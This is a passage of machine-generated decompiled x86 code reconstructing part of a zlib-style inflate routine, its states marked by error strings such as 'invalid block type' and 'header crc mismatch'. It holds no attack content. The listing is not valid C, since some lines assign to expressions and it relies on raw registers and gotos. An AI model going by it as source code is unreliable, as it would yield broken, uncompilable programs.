												if((__edi[4] & 0x00000200) == 0) {
													L133:
													__ecx = __edi[8];
													__eflags = __ecx;
													if(__ecx != 0) {
														__edi[4] = __edi[4] >> 9;
														__eax = __edi[4] >> 0x00000009 & 0x00000001;
														__eflags = __eax;
														 *(__ecx + 0x2c) = __eax;
														__eax = __edi[8];
														 *(__edi[8] + 0x30) = 1;
													}
													_push(0);
													_push(0);
													_push(0);
													__eax = E004102D0();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													__edi[6] = __eax;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xb;
													goto L175;
												} else {
													L126:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L130:
														__eax = __edi[6] & 0x0000ffff;
														__eflags = __edx - __eax;
														if(__edx == __eax) {
															L132:
															__ecx = 0;
															__esi = 0;
															__eflags = 0;
															 *(__esp + 0x10) = 0;
															goto L133;
														} else {
															L131:
															__ecx =  *(__esp + 0x48);
															 *(0x18 + __ecx) = "header crc mismatch";
															 *__edi = 0x1d;
														}
														goto L175;
													} else {
														L127:
														while(1) {
															L128:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L129:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L130;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 9:
												L136:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L139:
													__ecx = __edx;
													__edx = __edx << 0x10;
													__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
													__edx = __edx >> 8;
													__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
													__eax = __edx >> 0x00000008 & 0x0000ff00;
													__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
													__edx = __edx >> 0x18;
													__ecx =  *(__esp + 0x48);
													__eax = __eax + __edx;
													__edx = 0;
													__edi[6] = __eax;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xa;
													goto L140;
												} else {
													while(1) {
														L137:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L138:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L139;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0xa:
												L140:
												__eflags = __edi[3];
												if(__edi[3] == 0) {
													L335:
													__eax =  *(__esp + 0x24);
													 *(0xc + __ecx) =  *(__esp + 0x24);
													__eax =  *(__esp + 0x18);
													 *(__ecx + 0x10) =  *(__esp + 0x18);
													__eax = 2;
													 *__ecx = __ebx;
													 *(__ecx + 4) = __ebp;
													__edi[0xf] = __esi;
													_pop(__esi);
													_pop(__ebp);
													_pop(__ebx);
													__edi[0xe] = __edx;
													_pop(__edi);
													__esp = __esp + 0x34;
													return 2;
												} else {
													L141:
													_push(0);
													_push(0);
													_push(0);
													__eax = E00410AD0();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													__edi[6] = __eax;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xb;
													goto L142;
												}
												goto L360;
											case 0xb:
												L142:
												__eax =  *(__esp + 0x4c);
												__eflags = __eax - 5;
												if(__eax == 5) {
													L342:
													__edi =  *(__esp + 0x10);
													__edx = __eax;
													goto L97;
												} else {
													L143:
													__eflags = __eax - 6;
													if(__eax == 6) {
														goto L342;
													} else {
														goto L144;
													}
												}
												goto L360;
											case 0xc:
												L144:
												__eflags = __edi[1];
												if(__edi[1] == 0) {
													L146:
													__eflags = __esi - 3;
													if(__esi >= 3) {
														L149:
														__eax = __edx;
														__edx = __edx >> 1;
														__edi[1] = __eax;
														__eax = __edx;
														__eax = __edx & 0x00000003;
														__eflags = __eax - 3;
														if(__eax > 3) {
															L152:
															__ecx =  *(__esp + 0x48);
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															goto L175;
														} else {
															L150:
															switch( *((intOrPtr*)(__eax * 4 +  &M0040FEBC))) {
																case 0:
																	L151:
																	 *__edi = 0xd;
																	goto L152;
																case 1:
																	L153:
																	__eflags =  *(__esp + 0x4c) - 6;
																	__edi[0x13] = 0x412738;
																	__edi[0x15] = 9;
																	__edi[0x14] = 0x412f38;
																	__edi[0x16] = 5;
																	 *__edi = 0x13;
																	if( *(__esp + 0x4c) != 6) {
																		goto L152;
																	} else {
																		L154:
																		__edx = __edx >> 2;
																		__esi = __esi - 3;
																		 *(__esp + 0x10) = __edx;
																		goto L95;
																	}
																	goto L360;
																case 2:
																	L155:
																	_t254 = __esp + 0x48; // 0x9
																	__ecx =  *_t254;
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *__edi = 0x10;
																	 *(__esp + 0x10) = __edx;
																	goto L175;
																case 3:
																	L156:
																	_t256 = __esp + 0x48; // 0x9
																	__ecx =  *_t256;
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *(__esp + 0x10) = __edx;
																	 *(0x18 + __ecx) = "invalid block type";
																	 *__edi = 0x1d;
																	goto L175;
															}
														}
													} else {
														while(1) {
															L147:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L148:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 3;
															if(__esi < 3) {
																continue;
															} else {
																goto L149;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													L145:
													__ecx = __esi;
													 *__edi = 0x1a;
													__ecx = __esi & 0x00000007;
													__edx = __edx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x10) = __edx;
													goto L174;
												}
												goto L360;
											case 0xd:
												L157:
												__esi = __esi & 0x00000007;
												__edx = __edx >> __cl;
												__esi = __esi - (__esi & 0x00000007);
												 *(__esp + 0x10) = __edx;
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L161:
													__eax = __edx;
													__ecx = __edx;
													__eax =  !__edx;
													__ecx = __edx & 0x0000ffff;
													__eax =  !__edx >> 0x10;
													__eflags = __ecx - __eax;
													if(__ecx == __eax) {
														L163:
														__edx = 0;
														__edi[0x10] = __ecx;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														__eflags =  *(__esp + 0x4c) - 6;
														 *__edi = 0xe;
														if( *(__esp + 0x4c) == 6) {
															L341:
															__edi = 0;
															goto L96;
														} else {
															L164:
															__ecx =  *(__esp + 0x48);
															goto L165;
														}
													} else {
														L162:
														__ecx =  *(__esp + 0x48);
														 *(0x18 + __ecx) = "invalid stored block lengths";
														 *__edi = 0x1d;
														goto L175;
													}
												} else {
													L158:
													while(1) {
														L159:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L160:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L161;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0xe:
												L165:
												 *__edi = 0xf;
												goto L166;
											case 0xf:
												L166:
												__eax = __edi[0x10];
												 *(__esp + 0x34) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													L177:
													 *__edi = 0xb;
													goto L175;
												} else {
													L167:
													__eflags = __eax - __ebp;
													if(__eax > __ebp) {
														__eax = __ebp;
														 *(__esp + 0x34) = __ebp;
													}
													__ecx =  *(__esp + 0x18);
													__eflags = __eax - __ecx;
													if(__eax > __ecx) {
														__eax = __ecx;
														 *(__esp + 0x34) = __eax;
													}
													__eflags = __eax;
													if(__eax == 0) {
														goto L95;
													} else {
														L172:
														__eax = memcpy( *(__esp + 0x2c), __ebx, __eax);
														__eax =  *(__esp + 0x40);
														__esp = __esp + 0xc;
														 *(__esp + 0x18) =  *(__esp + 0x18) - __eax;
														__ebx = __ebx + __eax;
														 *(__esp + 0x24) =  *(__esp + 0x24) + __eax;
														__ebp = __ebp - __eax;
														_t279 =  &(__edi[0x10]);
														 *_t279 = __edi[0x10] - __eax;
														__eflags =  *_t279;
														 *(__esp + 0x14) = __ebx;
														goto L173;
													}
												}
												goto L360;
											case 0x10:
												goto L0;
											case 0x11:
												goto L185;
											case 0x12:
												L197:
												_t908 = _t1063[0x1a];
												 *(_t1104 + 0x34) = _t908;
												__eflags = _t908 - _t1063[0x19] + _t1063[0x18];
												if(_t908 >= _t1063[0x19] + _t1063[0x18]) {
													L233:
													__eflags =  *_t1063 - 0x1d;
													if( *_t1063 == 0x1d) {
														L173:
														_t1014 =  *(_t1104 + 0x10);
														goto L174;
													} else {
														L234:
														__eflags = _t1063[0x9c];
														if(_t1063[0x9c] != 0) {
															L237:
															_t754 =  &(_t1063[0x14c]);
															_t1063[0x15] = 9;
															_t1063[0x13] = _t754;
															_t1063[0x1b] = _t754;
															_t757 = E00410DF0(1,  &(_t1063[0x1c]), _t1063[0x18],  &(_t1063[0x1b]),  &(_t1063[0x15]),  &(_t1063[0xbc]));
															_t1104 = _t1104 + 0x18;
															 *(_t1104 + 0x2c) = _t757;
															__eflags = _t757;
															if(_t757 == 0) {
																L239:
																_t1063[0x14] = _t1063[0x1b];
																_t1063[0x16] = 6;
																_t1029 = E00410DF0(2, _t1063 + (_t1063[0x18] + 0x38) * 2, _t1063[0x19],  &(_t1063[0x1b]),  &(_t1063[0x16]),  &(_t1063[0xbc]));
																_t1104 = _t1104 + 0x18;
																 *(_t1104 + 0x2c) = _t1029;
																__eflags = _t1029;
																if(_t1029 == 0) {
																	L241:
																	_t1019 =  *((intOrPtr*)(_t1104 + 0x4c));
																	 *_t1063 = 0x13;
																	__eflags = _t1019 - 6;
																	if(_t1019 == 6) {
																		L340:
																		_t1064 =  *(_t1104 + 0x10);
																		goto L97;
																	} else {
																		L242:
																		_t1030 =  *(_t1104 + 0x10);
																		_t911 =  *(_t1104 + 0x48);
																		goto L243;
																	}
																} else {
																	L240:
																	_t894 =  *(_t1104 + 0x48);
																	_t1014 =  *(_t1104 + 0x10);
																	_t894[6] = "invalid distances set";
																	 *_t1063 = 0x1d;
																	goto L175;
																}
															} else {
																L238:
																_t894 =  *(_t1104 + 0x48);
																_t1014 =  *(_t1104 + 0x10);
																_t894[6] = "invalid literal/lengths set";
																 *_t1063 = 0x1d;
																goto L175;
															}
														} else {
															L235:
															_t894 =  *(_t1104 + 0x48);
															_t1014 =  *(_t1104 + 0x10);
															_t894[6] = "invalid code -- missing end-of-block";
															 *_t1063 = 0x1d;
															goto L175;
														}
													}
												} else {
													L198:
													_t1064 =  *(_t1104 + 0x10);
													do {
														L199:
														_t832 =  *(( *(_t1104 + 0x20))[0x13] + ((0x00000001 <<  *( *(_t1104 + 0x40))) - 0x00000001 & _t1064) * 4);
														 *(_t1104 + 0x38) = _t832;
														__eflags = (_t832 >> 0x00000008 & 0x000000ff) - _t1091;
														if((_t832 >> 0x00000008 & 0x000000ff) <= _t1091) {
															L203:
															_t1050 = _t832 >> 0x10;
															__eflags = _t1050 - 0x10;
															if(__eflags >= 0) {
																L205:
																if(__eflags != 0) {
																	L212:
																	__eflags =  *(_t1104 + 0x3a) - 0x11;
																	_t1051 =  *(_t1104 + 0x10);
																	_t991 = _t832 & 0x000000ff;
																	if( *(_t1104 + 0x3a) != 0x11) {
																		L219:
																		_t1089 = _t991 + 7;
																		 *(_t1104 + 0x38) = _t991;
																		__eflags = _t1091 - _t1089;
																		if(_t1091 >= _t1089) {
																			L224:
																			_t1052 = _t1051 >> _t991;
																			_t1014 = _t1052 >> 7;
																			__eflags = _t1014;
																			 *(_t1104 + 0x30) = 0xb + (_t1052 & 0x0000007f);
																			_t836 = 0xfffffff9;
																			goto L225;
																		} else {
																			L220:
																			while(1) {
																				L221:
																				__eflags = _t1097;
																				if(_t1097 == 0) {
																					goto L95;
																				}
																				L222:
																				_t844 = ( *_t868 & 0x000000ff) << _t1091;
																				_t868 =  &(_t868[1]);
																				_t1051 = _t1051 + _t844;
																				 *(_t1104 + 0x14) = _t868;
																				_t1091 = _t1091 + 8;
																				 *(_t1104 + 0x10) = _t1051;
																				_t1097 = _t1097 - 1;
																				__eflags = _t1091 - _t1089;
																				if(_t1091 < _t1089) {
																					continue;
																				} else {
																					L223:
																					_t991 =  *(_t1104 + 0x38);
																					goto L224;
																				}
																				goto L360;
																			}
																			goto L95;
																		}
																	} else {
																		L213:
																		_t1090 = _t991 + 3;
																		 *(_t1104 + 0x38) = _t991;
																		__eflags = _t1091 - _t1090;
																		if(_t1091 >= _t1090) {
																			L218:
																			_t1055 = _t1051 >> _t991;
																			_t1014 = _t1055 >> 3;
																			 *(_t1104 + 0x30) = (_t1055 & 0x00000007) + 3;
																			_t836 = 0xfffffffd;
																			L225:
																			_t1063 =  *(_t1104 + 0x20);
																			_t1091 = _t1091 + _t836 - _t991;
																			__eflags = _t1091;
																			 *(_t1104 + 0x38) = 0;
																			_t838 =  *(_t1104 + 0x30);
																			goto L226;
																		} else {
																			L214:
																			while(1) {
																				L215:
																				__eflags = _t1097;
																				if(_t1097 == 0) {
																					goto L95;
																				}
																				L216:
																				_t849 = ( *_t868 & 0x000000ff) << _t1091;
																				_t868 =  &(_t868[1]);
																				_t1051 = _t1051 + _t849;
																				 *(_t1104 + 0x14) = _t868;
																				_t1091 = _t1091 + 8;
																				 *(_t1104 + 0x10) = _t1051;
																				_t1097 = _t1097 - 1;
																				__eflags = _t1091 - _t1090;
																				if(_t1091 < _t1090) {
																					continue;
																				} else {
																					L217:
																					_t991 =  *(_t1104 + 0x38);
																					goto L218;
																				}
																				goto L360;
																			}
																			goto L95;
																		}
																	}
																} else {
																	L206:
																	_t1001 = (_t832 >> 0x00000008 & 0x000000ff) + 2;
																	 *(_t1104 + 0x38) = _t1001;
																	__eflags = _t1091 - _t1001;
																	if(_t1091 >= _t1001) {
																		L210:
																		_t1063 =  *(_t1104 + 0x20);
																		_t1002 = _t832 & 0x000000ff;
																		_t850 =  *(_t1104 + 0x34);
																		_t1091 = _t1091 - _t1002;
																		_t1014 =  *(_t1104 + 0x10) >> _t1002;
																		 *(_t1104 + 0x10) = _t1014;
																		__eflags = _t850;
																		if(_t850 == 0) {
																			L236:
																			_t894 =  *(_t1104 + 0x48);
																			_t894[6] = "invalid bit length repeat";
																			 *_t1063 = 0x1d;
																			goto L175;
																		} else {
																			L211:
																			 *(_t1104 + 0x38) =  *(_t1063 + 0x6e + _t850 * 2) & 0x0000ffff;
																			_t853 = _t1014 & 0x00000003;
																			_t1014 = _t1014 >> 2;
																			_t838 = _t853 + 3;
																			_t1091 = _t1091 - 2;
																			 *(_t1104 + 0x30) = _t838;
																			L226:
																			_t868 =  *(_t1104 + 0x14);
																			 *(_t1104 + 0x10) = _t1014;
																			__eflags = _t838 +  *(_t1104 + 0x34) - _t1063[0x19] + _t1063[0x18];
																			if(_t838 +  *(_t1104 + 0x34) > _t1063[0x19] + _t1063[0x18]) {
																				goto L236;
																			} else {
																				L227:
																				_t994 =  *(_t1104 + 0x30);
																				__eflags = _t994;
																				if(_t994 != 0) {
																					L228:
																					_t1054 =  *(_t1104 + 0x38);
																					do {
																						L229:
																						 *(_t1063 + 0x70 + _t1063[0x1a] * 2) = _t1054;
																						_t1063[0x1a] = 1 + _t1063[0x1a];
																						_t994 = _t994 - 1;
																						__eflags = _t994;
																					} while (_t994 != 0);
																				}
																				L230:
																				_t995 =  *(_t1104 + 0x20);
																				_t1064 =  *(_t1104 + 0x10);
																				goto L231;
																			}
																		}
																	} else {
																		L207:
																		while(1) {
																			L208:
																			__eflags = _t1097;
																			if(_t1097 == 0) {
																				goto L96;
																			}
																			L209:
																			_t1058 = ( *_t868 & 0x000000ff) << _t1091;
																			_t868 =  &(_t868[1]);
																			_t1064 = _t1064 + _t1058;
																			 *(_t1104 + 0x14) = _t868;
																			_t1091 = _t1091 + 8;
																			 *(_t1104 + 0x10) = _t1064;
																			_t1097 = _t1097 - 1;
																			__eflags = _t1091 -  *(_t1104 + 0x38);
																			if(_t1091 <  *(_t1104 + 0x38)) {
																				continue;
																			} else {
																				goto L210;
																			}
																			goto L360;
																		}
																		goto L96;
																	}
																}
															} else {
																L204:
																_t1004 = _t832 >> 0x00000008 & 0x000000ff;
																_t1091 = _t1091 - _t1004;
																_t1064 = _t1064 >> _t1004;
																_t995 =  *(_t1104 + 0x20);
																 *(_t1104 + 0x10) = _t1064;
																 *(_t995 + 0x70 +  *(_t1104 + 0x34) * 2) = _t1050;
																_t995[0x1a] = 1 + _t995[0x1a];
																goto L231;
															}
														} else {
															L200:
															while(1) {
																L201:
																__eflags = _t1097;
																if(_t1097 == 0) {
																	goto L96;
																}
																L202:
																_t1064 = _t1064 + (( *_t868 & 0x000000ff) << _t1091);
																_t868 =  &(_t868[1]);
																_t1091 = _t1091 + 8;
																_t1097 = _t1097 - 1;
																 *(_t1104 + 0x10) = _t1064;
																 *(_t1104 + 0x14) = _t868;
																_t832 =  *(( *(_t1104 + 0x20))[0x13] + ((0x00000001 <<  *( *(_t1104 + 0x40))) - 0x00000001 & _t1064) * 4);
																 *(_t1104 + 0x38) = _t832;
																__eflags = (_t832 >> 0x00000008 & 0x000000ff) - _t1091;
																if((_t832 >> 0x00000008 & 0x000000ff) > _t1091) {
																	continue;
																} else {
																	goto L203;
																}
																goto L360;
															}
															goto L96;
														}
														goto L360;
														L231:
														_t1053 = _t995[0x1a];
														 *(_t1104 + 0x34) = _t1053;
														__eflags = _t1053 - _t995[0x19] + _t995[0x18];
													} while (_t1053 < _t995[0x19] + _t995[0x18]);
													_t1063 =  *(_t1104 + 0x20);
													goto L233;
												}
												goto L360;
											case 0x13:
												L243:
												 *_t1063 = 0x14;
												goto L244;
											case 0x14:
												L244:
												__eflags = _t1097 - 6;
												if(_t1097 < 6) {
													L248:
													 *(_t1104 + 0x34) = _t1063[0x13];
													_t1063[0x6f1] = 0;
													_t769 =  *(_t1063[0x13] + ((0x00000001 << _t1063[0x15]) - 0x00000001 & _t1030) * 4);
													__eflags = 0xad - _t1091;
													if(0xad <= _t1091) {
														L251:
														__eflags = _t769;
														if(_t769 == 0) {
															L258:
															_t919 = _t769 >> 0x00000008 & 0x000000ff;
															_t1063[0x6f1] = _t1063[0x6f1] + _t919;
															_t1091 = _t1091 - _t919;
															_t1014 = _t1030 >> _t919;
															 *(_t1104 + 0x10) = _t1014;
															_t1063[0x10] = _t769 >> 0x10;
															__eflags = _t769;
															if(_t769 != 0) {
																L260:
																__eflags = _t769 & 0x00000020;
																if((_t769 & 0x00000020) == 0) {
																	L262:
																	__eflags = _t769 & 0x00000040;
																	if((_t769 & 0x00000040) == 0) {
																		L264:
																		_t771 = _t769 & 0xf;
																		__eflags = _t771;
																		 *_t1063 = 0x15;
																		_t1063[0x12] = _t771;
																		goto L265;
																	} else {
																		L263:
																		_t894 =  *(_t1104 + 0x48);
																		_t894[6] = "invalid literal/length code";
																		 *_t1063 = 0x1d;
																		goto L175;
																	}
																} else {
																	L261:
																	_t1063[0x6f1] = 0xffffffff;
																	 *_t1063 = 0xb;
																	goto L174;
																}
															} else {
																L259:
																 *_t1063 = 0x19;
																goto L174;
															}
														} else {
															L252:
															__eflags = _t769 & 0x000000f0;
															if((_t769 & 0x000000f0) != 0) {
																goto L258;
															} else {
																L253:
																_t964 = _t769 >> 8;
																_t1038 = _t769;
																 *(_t1104 + 0x30) = _t964;
																 *(_t1104 + 0x38) = _t1038;
																_t769 =  *( *(_t1104 + 0x34) + ((((0x00000001 << (_t769 & 0x000000ff) + (_t964 & 0x000000ff)) - 0x00000001 &  *(_t1104 + 0x10)) >> (_t964 & 0x000000ff)) + (_t769 >> 0x10)) * 4);
																__eflags = (_t769 >> 0x00000008 & 0x000000ff) + ( *(_t1104 + 0x30) & 0x000000ff) - _t1091;
																if((_t769 >> 0x00000008 & 0x000000ff) + ( *(_t1104 + 0x30) & 0x000000ff) <= _t1091) {
																	L257:
																	_t1063 =  *(_t1104 + 0x20);
																	_t868 =  *(_t1104 + 0x14);
																	_t973 = _t1038 & 0x000000ff;
																	_t1030 =  *(_t1104 + 0x10) >> _t973;
																	_t1091 = _t1091 - _t973;
																	__eflags = _t1091;
																	_t1063[0x6f1] = _t973;
																	goto L258;
																} else {
																	L254:
																	while(1) {
																		L255:
																		__eflags = _t1097;
																		if(_t1097 == 0) {
																			goto L95;
																		}
																		L256:
																		_t891 =  *(_t1104 + 0x14);
																		_t974 = _t1091;
																		_t1091 = _t1091 + 8;
																		_t1097 = _t1097 - 1;
																		 *(_t1104 + 0x10) =  *(_t1104 + 0x10) + (( *_t891 & 0x000000ff) << _t974);
																		 *(_t1104 + 0x14) =  &(_t891[1]);
																		_t893 = _t1038 & 0x000000ff;
																		_t769 =  *(( *(_t1104 + 0x20))[0x13] + ((((0x00000001 << (_t1038 & 0x000000ff) + _t893) - 0x00000001 &  *(_t1104 + 0x10)) >> _t893) + ( *(_t1104 + 0x3a) & 0x0000ffff)) * 4);
																		__eflags = (_t769 >> 0x00000008 & 0x000000ff) + _t893 - _t1091;
																		if((_t769 >> 0x00000008 & 0x000000ff) + _t893 > _t1091) {
																			continue;
																		} else {
																			goto L257;
																		}
																		goto L360;
																	}
																	goto L95;
																}
															}
														}
													} else {
														while(1) {
															L249:
															__eflags = _t1097;
															if(_t1097 == 0) {
																goto L95;
															}
															L250:
															_t822 = ( *_t868 & 0x000000ff) << _t1091;
															_t868 =  &(_t868[1]);
															_t1091 = _t1091 + 8;
															 *(_t1104 + 0x10) = _t1030 + _t822;
															_t1097 = _t1097 - 1;
															 *(_t1104 + 0x14) = _t868;
															_t769 =  *(_t1063[0x13] + ((0x00000001 << _t1063[0x15]) - 0x00000001 &  *(_t1104 + 0x10)) * 4);
															_t1030 =  *(_t1104 + 0x10);
															__eflags = (_t769 >> 0x00000008 & 0x000000ff) - _t1091;
															if((_t769 >> 0x00000008 & 0x000000ff) > _t1091) {
																continue;
															} else {
																goto L251;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													L245:
													__eflags =  *(_t1104 + 0x18) - 0x102;
													if( *(_t1104 + 0x18) < 0x102) {
														goto L248;
													} else {
														L246:
														_push( *((intOrPtr*)(_t1104 + 0x28)));
														_t911[3] =  *(_t1104 + 0x24);
														_t911[4] =  *(_t1104 + 0x1c);
														 *_t911 = _t868;
														_t911[1] = _t1097;
														_push(_t911);
														_t1063[0xe] = _t1030;
														_t1063[0xf] = _t1091;
														E00411250();
														_t894 =  *(_t1104 + 0x50);
														_t1104 = _t1104 + 8;
														__eflags =  *_t1063 - 0xb;
														_t1014 = _t1063[0xe];
														_t1091 = _t1063[0xf];
														_t868 =  *_t894;
														_t1097 = _t894[1];
														 *(_t1104 + 0x24) = _t894[3];
														 *(_t1104 + 0x18) = _t894[4];
														 *(_t1104 + 0x14) = _t868;
														 *(_t1104 + 0x10) = _t1014;
														if( *_t1063 == 0xb) {
															_t1063[0x6f1] = 0xffffffff;
														}
														goto L175;
													}
												}
												goto L360;
											case 0x15:
												L265:
												_t922 = _t1063[0x12];
												__eflags = _t922;
												if(_t922 == 0) {
													L271:
													_t1063[0x6f2] = _t1063[0x10];
													 *_t1063 = 0x16;
													goto L272;
												} else {
													L266:
													__eflags = _t1091 - _t922;
													if(_t1091 >= _t922) {
														L270:
														_t1091 = _t1091 - _t922;
														_t812 = (0x00000001 << _t922) - 0x00000001 & _t1014;
														_t1014 = _t1014 >> _t922;
														_t1063[0x10] = _t1063[0x10] + _t812;
														_t519 =  &(_t1063[0x6f1]);
														 *_t519 = _t1063[0x6f1] + _t922;
														__eflags =  *_t519;
														 *(_t1104 + 0x10) = _t1014;
														goto L271;
													} else {
														L267:
														while(1) {
															L268:
															__eflags = _t1097;
															if(_t1097 == 0) {
																goto L95;
															}
															L269:
															_t814 = ( *_t868 & 0x000000ff) << _t1091;
															_t868 =  &(_t868[1]);
															_t922 = _t1063[0x12];
															_t1014 = _t1014 + _t814;
															_t1091 = _t1091 + 8;
															 *(_t1104 + 0x10) = _t1014;
															_t1097 = _t1097 - 1;
															 *(_t1104 + 0x14) = _t868;
															__eflags = _t1091 - _t922;
															if(_t1091 < _t922) {
																continue;
															} else {
																goto L270;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 0x16:
												L272:
												 *(_t1104 + 0x34) = _t1063[0x14];
												_t778 =  *(_t1063[0x14] + ((0x00000001 << _t1063[0x16]) - 0x00000001 & _t1014) * 4);
												__eflags = 0xad - _t1091;
												if(0xad <= _t1091) {
													L275:
													__eflags = _t778 & 0x000000f0;
													if((_t778 & 0x000000f0) != 0) {
														L280:
														_t868 =  *(_t1104 + 0x14);
														_t930 = _t778 >> 0x00000008 & 0x000000ff;
														_t1063[0x6f1] = _t1063[0x6f1] + _t930;
														_t1091 = _t1091 - _t930;
														_t1014 = _t1014 >> _t930;
														 *(_t1104 + 0x10) = _t1014;
														__eflags = _t778 & 0x00000040;
														if((_t778 & 0x00000040) == 0) {
															L282:
															 *_t1063 = 0x17;
															_t780 = _t778 & 0xf;
															__eflags = _t780;
															_t1063[0x11] = _t778 >> 0x10;
															_t1063[0x12] = _t780;
															goto L283;
														} else {
															L281:
															_t894 =  *(_t1104 + 0x48);
															_t894[6] = "invalid distance code";
															 *_t1063 = 0x1d;
															goto L175;
														}
													} else {
														L276:
														_t939 = _t778 >> 8;
														_t1031 = _t778;
														 *(_t1104 + 0x30) = _t939;
														 *(_t1104 + 0x38) = _t1031;
														_t778 =  *( *(_t1104 + 0x34) + ((((0x00000001 << (_t778 & 0x000000ff) + (_t939 & 0x000000ff)) - 0x00000001 &  *(_t1104 + 0x10)) >> (_t939 & 0x000000ff)) + (_t778 >> 0x10)) * 4);
														__eflags = (_t778 >> 0x00000008 & 0x000000ff) + ( *(_t1104 + 0x30) & 0x000000ff) - _t1091;
														if((_t778 >> 0x00000008 & 0x000000ff) + ( *(_t1104 + 0x30) & 0x000000ff) <= _t1091) {
															L279:
															_t1063 =  *(_t1104 + 0x20);
															_t948 = _t1031 & 0x000000ff;
															_t1091 = _t1091 - _t948;
															_t1014 =  *(_t1104 + 0x10) >> _t948;
															_t559 =  &(_t1063[0x6f1]);
															 *_t559 = _t1063[0x6f1] + _t948;
															__eflags =  *_t559;
															goto L280;
														} else {
															while(1) {
																L277:
																__eflags = _t1097;
																if(_t1097 == 0) {
																	goto L95;
																}
																L278:
																_t882 =  *(_t1104 + 0x14);
																_t949 = _t1091;
																_t1091 = _t1091 + 8;
																_t1097 = _t1097 - 1;
																 *(_t1104 + 0x10) =  *(_t1104 + 0x10) + (( *_t882 & 0x000000ff) << _t949);
																 *(_t1104 + 0x14) =  &(_t882[1]);
																_t884 = _t1031 & 0x000000ff;
																_t778 =  *(( *(_t1104 + 0x20))[0x14] + ((((0x00000001 << (_t1031 & 0x000000ff) + _t884) - 0x00000001 &  *(_t1104 + 0x10)) >> _t884) + ( *(_t1104 + 0x3a) & 0x0000ffff)) * 4);
																__eflags = (_t778 >> 0x00000008 & 0x000000ff) + _t884 - _t1091;
																if((_t778 >> 0x00000008 & 0x000000ff) + _t884 > _t1091) {
																	continue;
																} else {
																	goto L279;
																}
																goto L360;
															}
															goto L95;
														}
													}
												} else {
													while(1) {
														L273:
														__eflags = _t1097;
														if(_t1097 == 0) {
															goto L95;
														}
														L274:
														_t807 = ( *_t868 & 0x000000ff) << _t1091;
														_t868 =  &(_t868[1]);
														_t1091 = _t1091 + 8;
														 *(_t1104 + 0x10) = _t1014 + _t807;
														_t1097 = _t1097 - 1;
														 *(_t1104 + 0x14) = _t868;
														_t778 =  *(_t1063[0x14] + ((0x00000001 << _t1063[0x16]) - 0x00000001 &  *(_t1104 + 0x10)) * 4);
														_t1014 =  *(_t1104 + 0x10);
														__eflags = (_t778 >> 0x00000008 & 0x000000ff) - _t1091;
														if((_t778 >> 0x00000008 & 0x000000ff) > _t1091) {
															continue;
														} else {
															goto L275;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0x17:
												L283:
												_t933 = _t1063[0x12];
												__eflags = _t933;
												if(_t933 == 0) {
													L289:
													 *_t1063 = 0x18;
													goto L290;
												} else {
													L284:
													__eflags = _t1091 - _t933;
													if(_t1091 >= _t933) {
														L288:
														_t1091 = _t1091 - _t933;
														_t797 = (0x00000001 << _t933) - 0x00000001 & _t1014;
														_t1014 = _t1014 >> _t933;
														_t1063[0x11] = _t1063[0x11] + _t797;
														_t577 =  &(_t1063[0x6f1]);
														 *_t577 = _t1063[0x6f1] + _t933;
														__eflags =  *_t577;
														 *(_t1104 + 0x10) = _t1014;
														goto L289;
